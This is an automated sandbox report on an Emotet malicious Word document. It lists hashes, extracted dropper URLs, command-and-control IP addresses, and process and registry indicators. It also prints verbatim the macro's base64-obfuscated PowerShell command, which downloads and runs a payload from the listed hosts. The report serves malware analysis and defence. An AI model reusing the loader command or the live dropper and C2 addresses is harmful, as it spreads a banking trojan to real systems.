Behavioral Report

Analysis

max time kernel
137s
max time network
141s
platform
windows10_x64
resource
win10v200722
submitted
27-08-2020 20:10

Sharing

Copy URL

Twitter E-mail

Report Files Registry Network Processes Mutex Misc

General

Target

emotet_e2_7b6977d2fea5ace224c2e46488cf144b41a82f88c0d6d7849472cba5bb54eecd_2020-08-27__200808._doc.doc
Size

218KB
MD5

a7bd894680e439fd8753e29b79cd2de2
SHA1

a4ef376a566225ba782d25ca5ea68f0e63b23826
SHA256

7b6977d2fea5ace224c2e46488cf144b41a82f88c0d6d7849472cba5bb54eecd
SHA512

224ac475a964c3dd60ca662c5324c753fd33208fd0b6c468bf6993f63b6a5e9a4b886c6bcf7952b0f6bcbd0213b3cf3ec8242834c70f4f095fc4862221502bf3

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://somosdrucken.com/upload/GGQL96W/

exe.dropper

http://www.vedigitize.com/wp-includes/l9K6YJ/

exe.dropper

http://www.sosyalben.org/hpKTnb/

exe.dropper

http://www.sutomoresmestaj.net/menu/E/

exe.dropper

http://www.traveltoharamain.com/cgi-bin/b/

exe.dropper

http://www.thinkdesign4u.com/css/Rtc1/

exe.dropper

https://www.mwk-bionik.de/fileadmin/vOJ/

Extracted

Family

emotet

172.91.208.86:80

45.55.36.51:443

91.83.93.99:7080

45.55.219.163:443

107.5.122.110:80

103.86.49.11:8080

85.105.205.77:8080

120.150.60.189:80

137.59.187.107:8080

139.59.60.244:8080

203.117.253.142:80

1.221.254.82:80

97.82.79.83:80

37.187.72.193:8080

139.99.158.11:443

152.168.248.128:443

74.208.45.104:8080

83.169.36.251:8080

169.239.182.217:8080

216.208.76.186:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3924	3884	powersheLL.exe

Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

21 3924 powersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

N3tnr9z.exeKBDDZO.exe

pid process

3896 N3tnr9z.exe
2096 KBDDZO.exe
Drops file in System32 directory 1 IoCs

Processes:

N3tnr9z.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\c_GSM7\KBDDZO.exe N3tnr9z.exe
Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe

flow	pid	process
21	3924	powersheLL.exe

pid	process
3896	N3tnr9z.exe
2096	KBDDZO.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\c_GSM7\KBDDZO.exe	N3tnr9z.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat	svchost.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

TTPs:

Query Registry System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 5 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 0d99ca53be7cd601	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0"	svchost.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

408 WINWORD.EXE
408 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powersheLL.exeKBDDZO.exe

pid process

3924 powersheLL.exe
3924 powersheLL.exe
3924 powersheLL.exe
2096 KBDDZO.exe
2096 KBDDZO.exe
2096 KBDDZO.exe
2096 KBDDZO.exe

pid	process
3924	powersheLL.exe
3924	powersheLL.exe
3924	powersheLL.exe
2096	KBDDZO.exe
2096	KBDDZO.exe
2096	KBDDZO.exe
2096	KBDDZO.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

svchost.exepowersheLL.exe

description	pid	process
Token: SeShutdownPrivilege	1504	svchost.exe
Token: SeCreatePagefilePrivilege	1504	svchost.exe
Token: SeDebugPrivilege	3924	powersheLL.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

WINWORD.EXEN3tnr9z.exeKBDDZO.exe

pid	process
408	WINWORD.EXE
408	WINWORD.EXE
408	WINWORD.EXE
408	WINWORD.EXE
408	WINWORD.EXE
408	WINWORD.EXE
408	WINWORD.EXE
408	WINWORD.EXE
408	WINWORD.EXE
3896	N3tnr9z.exe
3896	N3tnr9z.exe
2096	KBDDZO.exe
2096	KBDDZO.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

powersheLL.exeN3tnr9z.exe

description	pid	process	target process
PID 3924 wrote to memory of 3896	3924	powersheLL.exe	N3tnr9z.exe
PID 3924 wrote to memory of 3896	3924	powersheLL.exe	N3tnr9z.exe
PID 3924 wrote to memory of 3896	3924	powersheLL.exe	N3tnr9z.exe
PID 3896 wrote to memory of 2096	3896	N3tnr9z.exe	KBDDZO.exe
PID 3896 wrote to memory of 2096	3896	N3tnr9z.exe	KBDDZO.exe
PID 3896 wrote to memory of 2096	3896	N3tnr9z.exe	KBDDZO.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_7b6977d2fea5ace224c2e46488cf144b41a82f88c0d6d7849472cba5bb54eecd_2020-08-27__200808._doc.doc" /o ""

Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

PID:408

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc

Drops file in Windows directory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken

PID:1504

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe

powersheLL -e JABJAGIAOQBqADAAYgB4AD0AKAAnAE0AbAAnACsAKAAnAGgAbQAxACcAKwAnADEAagAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdABlAG0AcABcAFcAbwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQBSAEUAQwB0AE8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAHUAcgBJAFQAYAB5AHAAUgBgAE8AVABgAG8AQwBvAEwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAJwArACgAJwAxACcAKwAnADIALAAgACcAKQArACcAdAAnACsAKAAnAGwAJwArACcAcwAxADEALAAnACkAKwAoACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQATQByAGgAZQBkAGMAegAgAD0AIAAoACcATgAzACcAKwAnAHQAbgAnACsAKAAnAHIAOQAnACsAJwB6ACcAKQApADsAJABaAHIAdwByAHMAZwBsAD0AKAAoACcARgBmACcAKwAnAGQAcAAnACkAKwAnAHAAbQAnACsAJwBkACcAKQA7ACQATwAxAHAAcgA3ADMAcgA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACgAJwBYAGkAJwArACcAcQAnACkAKwAoACcAdwAnACsAJwBvAHIAZABYAGkAJwApACsAKAAnAHEAJwArACcAMgAwACcAKQArACgAJwAxADkAWABpACcAKwAnAHEAJwApACkALgAiAFIARQBwAGwAYABBAGMARQAiACgAKAAnAFgAaQAnACsAJwBxACcAKQAsACcAXAAnACkAKQArACQATQByAGgAZQBkAGMAegArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEIAMAAwAHYAdgBlAGwAPQAoACcARgA4ACcAKwAnAHcAJwArACgAJwBtAHUAbQAnACsAJwA3ACcAKQApADsAJABSAGQANQBjAGMAOABwAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAFcAZQBCAGMATABpAEUATgB0ADsAJABVAHAAcwBkADkAegBsAD0AKAAoACcAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAOgAnACsAJwAvACcAKwAnAC8AcwBvACcAKwAnAG0AbwBzAGQAcgB1AGMAJwApACsAJwBrACcAKwAnAGUAbgAnACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwAnACkAKwAoACcAdQBwAGwAbwAnACsAJwBhAGQAJwApACsAJwAvACcAKwAnAEcAJwArACgAJwBHAFEATAA5ACcAKwAnADYAJwArACcAVwAnACkAKwAoACcALwAqACcAKwAnAGgAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwB3AHcAdwAuAHYAZQAnACsAJwBkACcAKwAnAGkAJwApACsAJwBnACcAKwAoACcAaQB0ACcAKwAnAGkAJwApACsAKAAnAHoAZQAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKwAnAHcAcAAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACsAJwBlAHMAJwArACcALwBsACcAKQArACgAJwA5ACcAKwAnAEsANgAnACkAKwAoACcAWQAnACsAJwBKAC8AJwApACsAKAAnACoAaAB0AHQAJwArACcAcAAnACkAKwAnADoALwAnACsAJwAvAHcAJwArACgAJwB3AHcALgBzACcAKwAnAG8AJwApACsAKAAnAHMAJwArACcAeQBhAGwAYgAnACkAKwAoACcAZQAnACsAJwBuAC4AbwAnACkAKwAoACcAcgAnACsAJwBnAC8AJwApACsAJwBoACcAKwAoACcAcABLACcAKwAnAFQAbgBiACcAKQArACgAJwAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwB3AHcAJwArACcAdwAnACkAKwAoACcALgBzAHUAdAAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAG8AJwArACcAcgBlAHMAJwApACsAKAAnAG0AZQBzAHQAYQBqAC4AbgAnACsAJwBlACcAKwAnAHQALwBtAGUAJwArACcAbgB1ACcAKwAnAC8ARQAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAvACcAKwAnAHcAJwApACsAJwB3AHcAJwArACcALgB0ACcAKwAoACcAcgBhAHYAZQAnACsAJwBsAHQAbwBoAGEAcgAnACsAJwBhAG0AJwArACcAYQBpAG4ALgAnACkAKwAoACcAYwBvAG0AJwArACcALwBjACcAKQArACcAZwAnACsAKAAnAGkAJwArACcALQBiAGkAJwApACsAJwBuACcAKwAoACcALwAnACsAJwBiAC8AKgBoACcAKQArACgAJwB0AHQAcAA6AC8AJwArACcALwAnACsAJwB3AHcAJwApACsAKAAnAHcAJwArACcALgB0ACcAKwAnAGgAaQBuACcAKQArACgAJwBrAGQAJwArACcAZQBzACcAKQArACgAJwBpACcAKwAnAGcAbgA0AHUALgBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAYwAnACsAKAAnAHMAcwAnACsAJwAvAFIAdAAnACkAKwAoACcAYwAxACcAKwAnAC8AKgBoACcAKQArACcAdAB0ACcAKwAoACcAcABzADoAJwArACcALwAvAHcAJwApACsAKAAnAHcAJwArACcAdwAuAG0AJwApACsAKAAnAHcAawAtAGIAaQAnACsAJwBvACcAKwAnAG4AaQAnACkAKwAnAGsAJwArACgAJwAuACcAKwAnAGQAZQAvAGYAaQAnACsAJwBsAGUAYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAvAHYATwAnACsAJwBKAC8AJwApACkALgAiAFMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASgA5AGsAcwBwAGcAMAA9ACgAKAAnAFoAMgAnACsAJwBlACcAKQArACcAdgAnACsAKAAnAHgAJwArACcANQA3ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQATgA4AHIAcABxAG4AdgAgAGkAbgAgACQAVQBwAHMAZAA5AHoAbAApAHsAdAByAHkAewAkAFIAZAA1AGMAYwA4AHAALgAiAGQATwB3AGAATgBsAE8AQQBgAGQAZgBpAGwARQAiACgAJABOADgAcgBwAHEAbgB2ACwAIAAkAE8AMQBwAHIANwAzAHIAKQA7ACQAUgBhAGwAcwAwAGUAcAA9ACgAJwBFACcAKwAnADcAagAnACsAKAAnAHcAdgBfACcAKwAnADcAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQATwAxAHAAcgA3ADMAcgApAC4AIgBsAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADMANwA1ADYANAApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACgAJABPADEAcAByADcAMwByACkAOwAkAFMAYgByAGIAdwBkADgAPQAoACgAJwBSAHYANQBfACcAKwAnADEAJwApACsAJwBlACcAKwAnAG8AJwApADsAYgByAGUAYQBrADsAJABMAHkAdQBiAG4AcABqAD0AKAAoACcATABtACcAKwAnAHQAOQAnACkAKwAnAG0AJwArACcAMgBfACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBsADgANABvAGYAYgA9ACgAKAAnAEsAcgBsACcAKwAnAHQAJwApACsAKAAnAHYANgAnACsAJwBwACcAKQApAA==

Process spawned unexpected child process
Blacklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory

PID:3924

C:\Users\Admin\AppData\Local\Temp\word\2019\N3tnr9z.exe

"C:\Users\Admin\AppData\Local\Temp\word\2019\N3tnr9z.exe"

Executes dropped EXE
Drops file in System32 directory
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:3896

C:\Windows\SysWOW64\c_GSM7\KBDDZO.exe

"C:\Windows\SysWOW64\c_GSM7\KBDDZO.exe"

Executes dropped EXE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx

PID:2096

Network

MITRE ATT&CK Matrix

Collection

Command and Control

Credential Access

Defense Evasion

Discovery

Query Registry

T1012

System Information Discovery

T1082

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

Replay Monitor

00:00 00:00

Downloads

C:\Users\Admin\AppData\Local\Temp\WorD\2019\N3tnr9z.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\word\2019\N3tnr9z.exe

Download Submit
C:\Windows\SysWOW64\c_GSM7\KBDDZO.exe

Download Submit
memory/408-0-0x00007FF9D72B0000-0x00007FF9D7976000-memory.dmp

Filesize
6MB

Download
memory/408-4-0x0000014BC96B9000-0x0000014BC96CC000-memory.dmp

Filesize
76KB

Download
memory/2096-15-0x0000000000000000-mapping.dmp

Download
memory/2096-17-0x00000000021F0000-0x00000000021FC000-memory.dmp

Filesize
48KB

Download
memory/3896-11-0x0000000000000000-mapping.dmp

Download
memory/3896-14-0x0000000000A40000-0x0000000000A4C000-memory.dmp

Filesize
48KB

Download
memory/3924-8-0x00007FF9CFCA0000-0x00007FF9D068C000-memory.dmp

Filesize
9MB

Download
memory/3924-9-0x000001FD32F30000-0x000001FD32F31000-memory.dmp

Filesize
4KB

Download
memory/3924-10-0x000001FD330F0000-0x000001FD330F1000-memory.dmp

Filesize
4KB

Download